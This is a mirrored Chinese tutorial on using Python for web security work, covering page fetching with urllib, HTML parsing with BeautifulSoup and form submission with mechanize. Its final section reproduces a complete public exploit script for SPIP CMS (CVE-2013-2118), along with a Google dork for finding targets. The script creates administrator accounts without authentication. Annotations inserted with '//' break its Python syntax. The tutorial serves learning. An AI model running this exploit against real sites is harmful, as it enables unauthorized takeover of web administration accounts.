Python教程WEB安全篇

wyzsk發表於2020-08-19

原文網址 : https://zhuanlan.kanxue.com/article-13154.htm

作者： lxj616 · 2014/07/21 11:20

0x00 概述

本文從例項程式碼出發，講解了Python在WEB安全分析中的作用，以最基礎的示例向讀者展示了Python如何解析、獲取、以及處理各種型別的WEB頁面系統環境：kali + beautifulsoup + mechanize，由於不涉及底層驅動設計，文中的示例程式碼可以在任意平臺使用，當然無論什麼平臺都要安裝好所用的外掛。

0x01 利用python獲取WEB頁面

#!bash
Python 2.7.6 (default, Nov 10 2013, 19:24:24) [MSC v.1500 64 bit (AMD64)] on win32
Type "copyright", "credits" or "license()" for more information.
>>> import urllib

首先引入urllib以繼續下面的分析

#!python
>>> httpResponse = urllib.urlopen("http://www.baidu.com")

以百度為例獲取http響應

#!python
>>> httpResponse.code
200

狀態為200 OK

#!python
>>> print httpResponse.read()[0:500]

由於篇幅限制，只顯示前500好啦

<!DOCTYPE html><!--STATUS OK--><html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><link rel="dns-prefetch" href="//s1.bdstatic.com"/><link rel="dns-prefetch" href="//t1.baidu.com"/><link rel="dns-prefetch" href="//t2.baidu.com"/><link rel="dns-prefetch" href="//t3.baidu.com"/><link rel="dns-prefetch" href="//t10.baidu.com"/><link rel="dns-prefetch" href="//t11.baidu.com"/><link rel="dns-prefetch" href="//t12.baidu.co

看一下http響應的結構

#!python
>>> dir(httpResponse) ['doc', 'init', 'iter', 'module', 'repr', 'close', 'code', 'fileno', 'fp', 'getcode', 'geturl', 'headers', 'info', 'next', 'read', 'readline', 'readlines', 'url']

檢視響應所對應的url

#!python
>>> httpResponse.url
'http://www.baidu.com'

同理可檢視headers結構的內部結構

#!python
>>> dir(httpResponse.headers)
['__contains__', '__delitem__', '__doc__', '__getitem__', '__init__', '__iter__', '__len__', '__module__', '__setitem__', '__str__', 'addcontinue', 'addheader', 'dict', 'encodingheader', 'fp', 'get', 'getaddr', 'getaddrlist', 'getallmatchingheaders', 'getdate', 'getdate_tz', 'getencoding', 'getfirstmatchingheader', 'getheader', 'getheaders', 'getmaintype', 'getparam', 'getparamnames', 'getplist', 'getrawheader', 'getsubtype', 'gettype', 'has_key', 'headers', 'iscomment', 'isheader', 'islast', 'items', 'keys', 'maintype', 'parseplist', 'parsetype', 'plist', 'plisttext', 'readheaders', 'rewindbody', 'seekable', 'setdefault', 'startofbody', 'startofheaders', 'status', 'subtype', 'type', 'typeheader', 'unixfrom', 'values']
>>> httpResponse.headers.items()
[('bdqid', '0xeb89374a00028e2e'), ('x-powered-by', 'HPHP'), ('set-cookie', 'BAIDUID=0C926CCF670378EAAA0BD29C611B3AE8:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com, BDSVRTM=0; path=/, H_PS_PSSID=5615_4392_1423_7650_7571_6996_7445_7539_6505_6018_7254_7607_7134_7666_7415_7572_7580_7475; path=/; domain=.baidu.com'), ('expires', 'Tue, 15 Jul 2014 02:37:00 GMT'), ('vary', 'Accept-Encoding'), ('bduserid', '0'), ('server', 'BWS/1.1'), ('connection', 'Close'), ('cxy_all', 'baidu+776b3a548a71afebd09c6640f9af5559'), ('cache-control', 'private'), ('date', 'Tue, 15 Jul 2014 02:37:47 GMT'), ('p3p', 'CP=" OTI DSP COR IVA OUR IND COM "'), ('content-type', 'text/html; charset=utf-8'), ('bdpagetype', '1')]

試著簡單解析一個

#!python
>>> for header,value in httpResponse.headers.items() :
    print header+':'+value    

bdqid:0xeb89374a00028e2e
x-powered-by:HPHP
set-cookie:BAIDUID=0C926CCF670378EAAA0BD29C611B3AE8:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com, BDSVRTM=0; path=/, H_PS_PSSID=5615_4392_1423_7650_7571_6996_7445_7539_6505_6018_7254_7607_7134_7666_7415_7572_7580_7475; path=/; domain=.baidu.com
expires:Tue, 15 Jul 2014 02:37:00 GMT
vary:Accept-Encoding
bduserid:0
server:BWS/1.1
connection:Close
cxy_all:baidu+776b3a548a71afebd09c6640f9af5559
cache-control:private
date:Tue, 15 Jul 2014 02:37:47 GMT
p3p:CP=" OTI DSP COR IVA OUR IND COM "
content-type:text/html; charset=utf-8
bdpagetype:1

>>> url = http://www.baidu.com/s?wd=df&rsv_spt=1

完整的url用來獲取http頁面

#!python
>>> base_url = http://www.baidu.com

基礎url

#!python
>>> args = {'wd':'df','rsv_spt':1}

傳參單獨構造

#!python
>>> encode_args = urllib.urlencode(args)

Urlencode可以編碼url形式

#!python
>>> fp2=urllib.urlopen(base_url+'/s?'+encode_args)

重新嘗試以這樣的方式獲取WEB頁面

#!python
>>> print fp2.read()[0:500].decode("utf-8")

由於頁面是utf-8的，因此解碼中文自己設定

<!DOCTYPE html><!--STATUS OK--><html><head><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>df_百度搜尋</title><style data-for="result" >body{color:#333;background:#fff;padding:6px 0 0;margin:0;position:relative;min-width:900px}body,th,td,.p1,.p2{font-family:arial}p,form,ol,ul,li,dl,dt,dd,h3{margin:0;padding:0;list-style:none}input{padding-top:0;padding-bottom:0;-moz-box-sizing:border-box;-webkit-box-sizing
>>>

0x02 利用python解析html頁面

首先安裝beautifulsoup ，http://www.crummy.com/software/BeautifulSoup/

#!bash
[email protected]:~/Desktop/beautifulsoup4-4.3.2# python setup.py install
running install
running build
running build_py
creating build/lib.linux-x86_64-2.7
creating build/lib.linux-x86_64-2.7/bs4
copying bs4/dammit.py -> build/lib.linux-x86_64-2.7/bs4
copying bs4/testing.py -> build/lib.linux-x86_64-2.7/bs4
copying bs4/element.py -> build/lib.linux-x86_64-2.7/bs4
copying bs4/__init__.py -> build/lib.linux-x86_64-2.7/bs4
…………………………………………………………部分省略
copying bs4/diagnose.py -> build/lib.linux-x86_64-2.7/bs4
creating build/lib.linux-x86_64-2.7/bs4/builder
copying bs4/builder/_lxml.py -> build/lib.linux-x86_64-2.7/bs4/builder
copying bs4/builder/_htmlparser.py -> build/lib.linux-x86_64-2.7/bs4/builder
[email protected]:~/Desktop/beautifulsoup4-4.3.2#

下面就可以使用bs4了

#!bash
[email protected]:~# python
Python 2.7.3 (default, Jan  2 2013, 13:56:14) 
[GCC 4.7.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from bs4 import BeautifulSoup

匯入bs4的包（之前安裝過了）

#!python
>>> import urllib
>>> html = urllib.urlopen('http://www.baidu.com')
>>> html.code
200
>>> bt = BeautifulSoup(html.read(),"lxml")

Lxml解析大概是kali自帶的，windows下自己裝比較麻煩

#!python
>>> bt.title

標題

#!python
<title>百度一下，你就知道</title>
>>> bt.title.string
u'\u767e\u5ea6\u4e00\u4e0b\uff0c\u4f60\u5c31\u77e5\u9053'
>>> bt.meta
<meta content="text/html;charset=utf-8" http-equiv="content-type"/>
>>> bt.meta.next
<meta content="IE=Edge" http-equiv="X-UA-Compatible"/>
>>> bt.meta.next.next
<link href="//s1.bdstatic.com" rel="dns-prefetch"/>
>>> allMetaTags = bt.find_all('meta')

找出所有的meta資料標籤

#!python
>>> allMetaTags
[<meta content="text/html;charset=utf-8" http-equiv="content-type"/>, <meta content="IE=Edge" http-equiv="X-UA-Compatible"/>, <meta content="0; url=/baidu.html?from=noscript" http-equiv="refresh"/>]
>>> allMetaTags[0]
<meta content="text/html;charset=utf-8" http-equiv="content-type"/>

>>> allLinks = bt.find_all('a')

找出所有的a標籤（連結）

#!python
>>> allLinks[0]
<a href="http://www.baidu.com/gaoji/preferences.html" onmousedown="return user_c({'fm':'set','tab':'setting','login':'0'})">搜尋設定</a>
>>> allLinks[1]
<a href="/" id="btop" onmousedown="return user_c({'fm':'set','tab':'index','login':'0'})">百度首頁</a>

>>> for link in allLinks:
...     print link['href']
...

試著簡單的解析一下

http://www.baidu.com/gaoji/preferences.html
https://passport.baidu.com/v2/?login&tpl=mn&u=http%3A%2F%2Fwww.baidu.com%2F
https://passport.baidu.com/v2/?reg&regType=1&tpl=mn&u=http%3A%2F%2Fwww.baidu.com%2F
http://news.baidu.com/ns?cl=2&rn=20&tn=news&word=
http://tieba.baidu.com/f?kw=&fr=wwwt
http://zhidao.baidu.com/q?ct=17&pn=0&tn=ikaslist&rn=10&word=&fr=wwwt
http://music.baidu.com/search?fr=ps&key=
http://image.baidu.com/i?tn=baiduimage&ps=1&ct=201326592&lm=-1&cl=2&nc=1&word=
http://v.baidu.com/v?ct=301989888&rn=20&pn=0&db=0&s=25&word=
http://map.baidu.com/m?word=&fr=ps01000
http://wenku.baidu.com/search?word=&lm=0&od=0

0x03 利用python+mechanize處理表單

#!python
[email protected]:~# python
Python 2.7.3 (default, Jan  2 2013, 13:56:14) 
[GCC 4.7.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import mechanize

匯入mechanize

#!python
>>> br = mechanize.Browser()

構建一個瀏覽器例項

#!python
>>> br.open('http://www.17173.com')

開啟一個有表單的頁面

#!python
<response_seek_wrapper at 0x248db90 whose wrapped object = <closeable_response at 0x248d098 whose fp = <socket._fileobject object at 0x1f868d0>>>

>>> for form in br.forms():
...     print form
... 

<GET http://search.17173.com/jsp/news_press.jsp application/x-www-form-urlencoded
  <HiddenControl(charset=gbk) (readonly)>
  <TextControl(keyword=��������)>
  <SubmitControl(<None>=����) (readonly)>>
<searchask GET http://search.17173.com/jsp/game.jsp application/x-www-form-urlencoded
  <HiddenControl(charset=gbk) (readonly)>
  <TextControl(<None>=)>
  <TextControl(<None>=)>>
<voteform POST http://vote.17173.com/action/vote_process.php application/x-www-form-urlencoded
  <HiddenControl(vote_id=9624) (readonly)>
  <HiddenControl(vote_year=) (readonly)>
  <CheckboxControl(vote_item_9624[]=[49649, 49650, 49651, 49652, 49653, 49654, 49655, 49656])>
  <SubmitControl(<None>=) (readonly)>>
<GET http://search.17173.com/jsp/news_press.jsp application/x-www-form-urlencoded
  <HiddenControl(charset=gbk) (readonly)>
  <TextControl(keyword=��������)>
  <SubmitControl(<None>=����) (readonly)>>
>>> 

>>> br.select_form(nr=0)

選擇要處理的表單

#!python
>>> br.form['keyword']='2013'

設定表單屬性的值（TextControl）

#!python
>>> br.submit()

模擬瀏覽器提交表單

#!python
<response_seek_wrapper at 0x248dab8 whose wrapped object = <closeable_response at 0x249d950 whose fp = <socket._fileobject object at 0x243e5d0>>>
>>> br
<mechanize._mechanize.Browser instance at 0x242ff38>
>>>

0x04 例項分析

以下是一個CMS的管理員密碼能被越權找回漏洞，原作者資訊均完整保留

#!python
#!/usr/bin/env python
# Exploit Title: SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege escalation to administrator account from non authenticated user
# Date: 04/30/2014
# Flaw finder : Unknown
# Exploit Author: Gregory DRAPERI
# Email: gregory |dot| draperi |at| gmail |dot| com
# Google Dork : inurl="spip.php"
# Vendor Homepage: www.spip.net
# Software Link: http://files.spip.org/spip/archives/
# Version: SPIP < 3.0.9 / 2.1.22 / 2.0.23
# Tested on: Windows 7 - SPIP 2.2.21
# CVE : CVE-2013-2118
'''
---------------------------------------------------------------------------------------------------------
Software Description:
SPIP is a free software content management system
---------------------------------------------------------------------------------------------------------
Vulnerability Details:
This vulnerability allows remote attackers to create an administrator account on the CMS without being authenticated.
To exploit the flaw, a SMTP configuration has to be configured on SPIP because the password is sent by mail.

'''
import urllib, urllib2
import cookielib
import sys
import re

def send_request(urlOpener, url, post_data=None):
//傳送url（可選是否post）
   request = urllib2.Request(url)
//使用urllib2來處理http請求
   url = urlOpener.open(request, post_data)
   return url.read()

if len(sys.argv) < 4:
//簡單的系統提示
   print "SPIP < 3.0.9 / 2.1.22 / 2.0.23 exploit by Gregory DRAPERI\n\tUsage: python script.py <SPIP base_url> <login> <mail>"
   exit()

base_url = sys.argv[1]
//網站地址
login = sys.argv[2]
//登陸地址
mail = sys.argv[3]
//越權傳送郵件目的郵箱

cookiejar = cookielib.CookieJar()
//處理cookie以偽造身份
urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))


formulaire = send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo")
print "[+] First request sended..."
//傳送HTTP請求


m = re.search("<input name='formulaire_action_args' type='hidden'\n[^>]*", formulaire)

//尋找目標表單

m = re.search("(?<=value=')[\w\+/=]*",m.group(0));


formulaire_data = {'var_ajax' : 'form',
                   'page' : 'identifiants',
                   'mode' : '0minirezo',
                   'formulaire_action' : 'inscription',
                   'formulaire_action_args' : m.group(0),
                   'nom_inscription' : login,
                   'mail_inscription' : mail,
                   'nobot' : ''
                  }
//構造請求中各引數
formulaire_data = urllib.urlencode(formulaire_data)
//進行url編碼


send_request(urlOpener, base_url+"/spip.php?page=identifiants&mode=0minirezo", formulaire_data)
print "[+] Second request sended"


print "[+] You should receive an email with credentials soon :) "
//第二次傳送請求完畢後目標已經完成

本文章來源於烏雲知識庫，此映象為了方便大家學習研究，文章版權歸烏雲知識庫！

Python教程網路安全篇
2020-08-19
Python
Python安裝教程
2024-08-25
Python
Python安裝教程分享
2021-09-09
Python
Python Flask Web教程001：Flask簡介
2020-12-14
PythonFlaskWeb
Python安裝教程(非常詳細) python如何安裝使用
2021-12-16
Python
Web前端和Python學哪個比較好？Python教程！
2021-04-14
Web前端Python
無涯教程：Docker - Python安裝
2021-09-09
DockerPython
Python庫安裝教程之Numpy
2021-05-21
Python
Python 與 PyCharm 安裝詳細教程
2019-02-19
PythonPyCharm
【python與pycharm安裝教程，詳解】
2022-03-28
PythonPyCharm
python詳細的安裝教程分享！
2021-05-21
Python
資料中臺(安全篇)
2022-01-14
fastdfs管理工具Go-fastdfs-web 安裝教程
2024-10-26
ASTGoWeb
Eclipse安裝教程 ——史上最詳細安裝java &python教程說明【附視訊安裝演示】
2020-04-04
EclipseJavaPython
Web Scraper教程
2018-12-11
Web
win10怎麼安裝python_win10系統python安裝教程
2020-06-19
Win10Python
Redux原始碼全篇淺讀
2019-02-25
Redux原始碼
最新openCV-Python安裝教程(opencv-python版本4.4.0, Python版本: 3.9)
2020-10-18
OpenCVPython
Python Web開發常用的第三方庫有哪些?Python教程!
2021-07-14
PythonWeb
CentOS下編譯安裝Python3教程
2019-03-03
CentOS編譯Python
Python技術分享：numpy庫的安裝教程
2021-04-16
Python
python web
2020-12-30
PythonWeb
【Python篇】---Python3.5在Centoos的安裝教程--超實用
2018-03-07
Python
Web Worker 使用教程
2018-07-08
Web
Spring Web Service教程
2020-10-22
SpringWeb
安全篇-AES/RSA加密機制
2018-07-18
加密
Centos 7系統安裝python 3.9.10詳細教程。
2024-02-19
CentOSPython
一款非常好用的Web端SSH工具：GateOne安裝教程
2018-10-07
Web
python web 部署
2018-08-15
PythonWeb
Python Web Dev
2024-09-06
PythonWebdev
如何安裝Python執行環境Anaconda？（視訊教程）
2018-06-28
Python
Python 教程
2018-12-19
Python
使用fjpublish釋出前端專案（安全篇）
2019-01-23
前端
如何登入銳捷裝置（安全篇）
2022-11-11
JSON Web Token 入門教程
2018-07-23
JSONWeb
web基礎教程：隨筆
2020-10-26
Web
Python Web開發
2018-12-27
PythonWeb
python中安裝配置pyspark庫教程需要配合spark+hadoop使用
2018-06-17
PythonSparkHadoop